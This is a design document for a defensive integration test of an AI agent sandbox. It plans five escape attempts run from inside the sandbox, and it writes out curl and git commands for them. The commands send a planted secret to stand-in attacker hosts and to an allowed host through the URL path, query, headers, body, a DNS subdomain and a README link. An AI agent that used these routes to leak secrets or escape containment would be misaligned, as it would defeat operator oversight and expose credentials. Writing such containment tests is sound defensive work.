# PRD 0022: End-to-end sandbox-escape integration test - **Status:** Draft - **Author:** didericis - **Created:** 2026-05-26 ## Summary A new integration test, `tests/integration/test_sandbox_escape.py`, that brings up a real bottle with a known allowlist + a known in-bottle secret, then runs five attacks from inside the agent container and asserts each one fails. The five categories are the live cross-section of how the sandbox is supposed to be load-bearing: 1. Request to a non-allowlisted hostname 2. Request to a non-allowlisted IP literal 3. Secret exfiltration to an allowed dest via HTTP (URL path, query string, request body, request headers) 4. Secret exfiltration to an allowed dest via crafted DNS (subdomain-encoded host) 5. Secret exfiltration via a link inside a README pushed through git-gate The suite is the backend-agnostic gate the smolmachines work has to pass before that backend can be considered a viable substitute for Docker. Today's Docker backend is the backend-under-test; the suite runs against whatever `CLAUDE_BOTTLE_BACKEND` resolves to. ## Problem The sandbox today is a composition of layers (pipelock, egress, git-gate, `--internal` network, supervise) each tested in isolation but never as a whole. The supervise integration test exercises the MCP plumbing; `test_orphan_cleanup` covers the cleanup CLI; the per-sidecar integration tests bring up one sidecar at a time. None of them ask the operator-relevant question: **can an in-bottle agent get a secret out?** That's the question every prospective backend has to answer before it can ship. Smolmachines (or any other VM-based backend) will reimplement the sidecar topology over a different runtime. Without a backend-agnostic test we'd be reading the layers' code by eye to confirm each new backend glues them correctly. The diff between "looks right" and "actually blocks exfil" is the whole point of the project. ## Goals / Success Criteria The test suite passes when **every one of the five attacks fails** with a clear permissions-error signal: 1. **Hostname not in allowlist.** Agent's `curl https://evil.example.com/` returns non-200 (proxy rejection, connection error, or 403). The test asserts the exit code is non-zero AND the response body / stderr does not contain the upstream's actual response. 2. **IP literal not in allowlist.** Agent's `curl https://198.51.100.1/` (RFC 5737 documentation range) is blocked. Additionally tests `curl --resolve api.anthropic.com:443:198.51.100.1 https://api.anthropic.com/` to confirm the host header trick doesn't bypass DNS resolution. 3. **Secret in HTTP request to an allowed destination.** A known SECRET env var is planted in the bottle. The agent tries four shapes against the allowlisted destination: - Secret in URL path: `GET /v1/` - Secret in query string: `GET /v1/?leak=` - Secret in request body: `POST /v1/messages` with JSON containing the secret - Secret in request headers: `GET /v1/` with `X-Custom: ` The test asserts pipelock's DLP body scanner rejects (3) and surfaces what (1)/(2)/(4) actually do — they may currently pass through (see open questions). 4. **Secret-bearing DNS subdomain to allowed dest's parent.** Agent runs `curl https://.api.anthropic.com/`. The hostname is constructed to look "under" an allowlisted apex but the SECRET payload leaks via the DNS query to whichever resolver pipelock/egress consults. The test asserts pipelock rejects the host BEFORE issuing the DNS query (host-allowlist matches the exact apex, not subdomains). 5. **Secret-bearing link in a PR README.** Agent edits `README.md` to include `[click](https://attacker.example.com/?leak=)`, commits, and `git push`es through git-gate. The pre-receive hook's gitleaks scan must reject the push because the secret matches one of gitleaks's bundled rules. The "pass" condition is uniform across all five: the attack's exit code is non-zero AND the secret never reaches a network destination outside the bottle. ## Non-goals - **Detecting exfiltration via side channels** — timing, cache state, error-message-length oracles. v1 covers the direct paths only. - **Asserting on specific error messages or HTTP status codes.** Each layer (pipelock / egress / git-gate / gitleaks) has its own rejection vocabulary. The test asserts on the OUTCOME (attack failed, no upstream traffic) not the WORDING. - **Testing the Docker backend's specific sandbox implementation in detail.** That's what the per-sidecar integration tests already do. This suite is composite: did the whole bottle prevent leakage, regardless of which layer caught it? - **A network-tap that confirms zero packets reached attacker.example.com.** Out of scope for v1; we trust the pipelock/egress error reporting and verify exit codes. If we want zero-packets confirmation later, a host-side iptables / pcap layer can extend the suite. - **Running against a backend that doesn't exist yet.** The suite is written against the abstract `BottleBackend` API via the existing `get_bottle_backend()` selector; future smolmachines work flips `CLAUDE_BOTTLE_BACKEND=smolmachines` and reruns. No smolmachines-specific code here. ## Scope ### In scope - A new `tests/integration/test_sandbox_escape.py` with one TestSandboxEscape class and one `test__` method per attack. - A test fixture that: - Builds a manifest with one bottle, one agent - The bottle declares: a few allowlisted egress routes (api.anthropic.com, etc.), a git-gate upstream pointing at a throwaway repo, supervise off (not under test) - Plants a known `TEST_SECRET` value in the bottle's env. The value matches a gitleaks rule (e.g., shaped like an Anthropic API key) so the README test fires the right pre-receive rejection. - A `_run_in_agent(script)` helper that wraps `bottle.exec(script)` and returns an `ExecResult`. - Assertions per category that read the existing `ExecResult.returncode` / `.stdout` / `.stderr`. ### Out of scope - The per-attack remediation engines. If a category's assertion fails, the test is reporting a real gap — the remediation is its own PRD. - Running the suite as part of every PR's CI. v1 lives in `tests/integration/` and runs locally on demand; CI integration is a follow-up that has to weigh wall-clock cost (bringup is ~10s per test class). ## Proposed design ### Single fixture per attack class `setUpClass` brings the bottle up once; `tearDownClass` brings it down. Per-test setup is cheap (resetting any secret-content-storage). The five attacks share the same bottle so the suite is ~15s wall-clock total instead of ~50s with per-test bringup. ### Bottle manifest ```yaml # tests/integration/fixtures/sandbox-escape/agents/sandbox-tester.md --- bottle: dev --- (no prompt — exec_claude isn't called) ``` ```yaml # tests/integration/fixtures/sandbox-escape/bottles/dev.md --- env: - name: TEST_SECRET value: sk-ant-api03-fake-shape-but-realistic-length-for-gitleaks egress: routes: - host: api.anthropic.com git: - Name: throwaway Upstream: ssh://git@127.0.0.1:22/throwaway.git IdentityFile: ~/.ssh/cb-test-key # fixture key --- ``` `TEST_SECRET` is shaped like an Anthropic API key so gitleaks's `anthropic-api-key` rule fires on the README. We don't ship a real key; the prefix-pattern + length match the rule's regex. The git upstream URL is unreachable on purpose — we want git-gate's pre-receive hook to reject the push BEFORE it tries to forward to a real upstream. The hook's gitleaks scan happens first. ### Per-attack scaffolding Each test calls `bottle.exec(script)` (the existing `Bottle.exec` from `claude_bottle.backend.Bottle`) and asserts on the returncode + stdout + stderr. The agent container has `curl`, `git`, `dig`, etc. pre- installed (already true today for the Docker bottle image). ### Attack-1: hostname not in allowlist ```python def test_1_hostname_not_in_allowlist(self): result = self.bottle.exec( 'curl --silent --max-time 5 --fail ' 'https://evil.example.com/ ; echo "exit=$?"' ) self.assertNotEqual(0, result.returncode) # The attack's stdout should not contain anything from # evil.example.com — pipelock should have stopped it. self.assertNotIn("evil.example.com", result.stdout) self.assertIn("exit=", result.stdout) # extract the curl exit, assert non-zero ... ``` ### Attack-2: IP literal not in allowlist ```python def test_2_ip_not_in_allowlist(self): # Direct IP result = self.bottle.exec( 'curl --silent --max-time 5 --fail https://198.51.100.1/' ) self.assertNotEqual(0, result.returncode) # Host-header spoof result = self.bottle.exec( 'curl --silent --max-time 5 --fail ' '--resolve api.anthropic.com:443:198.51.100.1 ' 'https://api.anthropic.com/' ) self.assertNotEqual(0, result.returncode) ``` ### Attack-3: HTTP exfil shapes Loop over four shapes (path / query / body / header), assert each one is blocked by either pipelock's DLP or egress's path-filter. Headers in particular may not be DLP- scanned today — surface that gap clearly if so. ```python SHAPES = [ ("path", 'curl -sf "https://api.anthropic.com/v1/$TEST_SECRET"'), ("query", 'curl -sf "https://api.anthropic.com/v1/?leak=$TEST_SECRET"'), ("body", 'curl -sf -X POST "https://api.anthropic.com/v1/messages" ' '-H "Content-Type: application/json" ' '-d "{\\"secret\\": \\"$TEST_SECRET\\"}"'), ("header", 'curl -sf "https://api.anthropic.com/v1/" ' '-H "X-Custom: $TEST_SECRET"'), ] def test_3_http_exfil_blocked(self): for name, cmd in SHAPES: with self.subTest(shape=name): result = self.bottle.exec(cmd) self.assertNotEqual( 0, result.returncode, f"{name} exfil should have been blocked", ) ``` ### Attack-4: DNS exfil via crafted subdomain ```python def test_4_dns_exfil_blocked(self): result = self.bottle.exec( 'curl --silent --max-time 5 --fail ' '"https://$TEST_SECRET.api.anthropic.com/"' ) self.assertNotEqual(0, result.returncode) ``` Asserts the host wasn't in pipelock's exact-match allowlist (api.anthropic.com matches `api.anthropic.com`, not `.api.anthropic.com`). ### Attack-5: secret in README push ```python def test_5_readme_push_blocked(self): result = self.bottle.exec( 'cd /tmp && git init test-repo && cd test-repo && ' 'git config user.email "test@example.com" && ' 'git config user.name "test" && ' 'echo "[click](https://attacker.example.com/?leak=$TEST_SECRET)" > README.md && ' 'git add . && git commit -m "leak" && ' 'git remote add origin ' 'git://claude-bottle-git-gate-/throwaway.git && ' 'git push origin master' ) self.assertNotEqual(0, result.returncode) self.assertIn("gitleaks", (result.stderr + result.stdout).lower()) ``` The `` is templated via the bottle's known identity at fixture-time. Asserts gitleaks fired (looking for the literal "gitleaks" in stderr). ## Implementation chunks Sized small. 1. **Fixture manifest + secret env-var plumbing.** Just the files under `tests/integration/fixtures/sandbox-escape/` and the test class scaffolding with `setUpClass` / `tearDownClass` bringing up + tearing down the bottle. No attack tests yet. 2. **Attack 1 + 2 (hostname + IP).** The simplest two — curl returns non-zero, that's the assertion. 3. **Attack 3 (HTTP exfil shapes).** Parameterized over the four shapes via subTest. Likely surfaces gaps in current DLP coverage for header / path / query shapes. 4. **Attack 4 (DNS exfil).** Exact-match-allowlist verification. 5. **Attack 5 (README push via git-gate).** Hardest because it requires the git-gate sidecar configured and the gitleaks rule fired. The "throwaway" upstream URL is intentionally unreachable to keep the test fully self-contained. ## Open questions 1. **What does today's pipelock actually do for shapes 3.1, 3.2, 3.4?** DLP body-scanning is a known feature; URL / path / header scanning is less clear. The test will tell us — if a shape passes today (attack succeeds), it's a real gap and the test fails LOUDLY rather than silently passing. Either: - Treat the test as authoritative: every shape MUST block for the suite to pass. Failing shapes are real bugs. - Treat the test as descriptive: mark the failing shapes `expectedFailure` and resolve them in a follow-up PRD. Lean toward the first — the project's purpose is sandbox integrity; documenting "we knowingly leak headers" is worse than fixing it. But for v1 of this test it's OK to land with `expectedFailure` markers + tickets. 2. **DNS exfil via the agent's direct DNS resolver.** Today the agent's `--internal` network has no default gateway, so direct DNS queries to 8.8.8.8 fail. The crafted- hostname attack rides on pipelock's resolution, which is what test 4 covers. Should we ALSO test that direct DNS (e.g., `dig @8.8.8.8 secret.example.com`) is blocked? Probably yes — adds one assertion to test 4 and confirms the network isolation is intact. 3. **Realistic fake secret.** `sk-ant-api03-...` shape is what gitleaks's anthropic-api-key rule matches. Verify the exact regex before settling on the fixture value; wrong-shape secret would mean attack 5 silently passes the wrong way (gitleaks doesn't fire, README ships). 4. **Reachability of throwaway git upstream.** Pointing at `ssh://git@127.0.0.1:22/throwaway.git` means git-gate would try (and fail) to push to upstream after gitleaks passes. We want gitleaks to REJECT before any upstream attempt — so the push always fails at gitleaks, never later. Confirm this ordering in git-gate's pre-receive sequence. 5. **CI vs. local-only.** The integration test takes ~15s (compose-up + 5 attacks + teardown). Running it on every PR pays for itself the first time it catches a sandbox regression but slows the green-tick feedback for unrelated PRs. v1 ships as a local-only test; CI integration is a follow-up that decides whether to gate merges on it. 6. **Backend-agnostic invocation.** The suite reads `CLAUDE_BOTTLE_BACKEND` so it runs against whatever backend is active. For the smolmachines spike, the developer sets that env var + runs the same test file. No code change needed in the suite itself. Worth verifying the existing `get_bottle_backend()` machinery handles the backend-not-yet-implemented case gracefully (it dies with a clear message today — confirm that's what we want). 7. **Test environment requirements.** The agent container needs `curl`, `git`, `dig`. Already in today's Docker image; need to declare these as required for any future backend's base image too. Worth noting in the smolmachines PRD. ## References - PRD 0017 — egress-proxy + path-allowlist + auth injection (the layer test 3 + 4 stresses) - PRD 0014 / 0015 — pipelock / egress remediation flows (the surfaces the attacks would propose changes to if denied via the supervise route) - PRD 0008 — git-gate + pre-receive gitleaks (the layer test 5 stresses) - PRD 0018 — compose-per-instance (the topology the test brings up) - `tests/integration/test_supervise_sidecar.py` — the existing single-sidecar integration test pattern this suite generalizes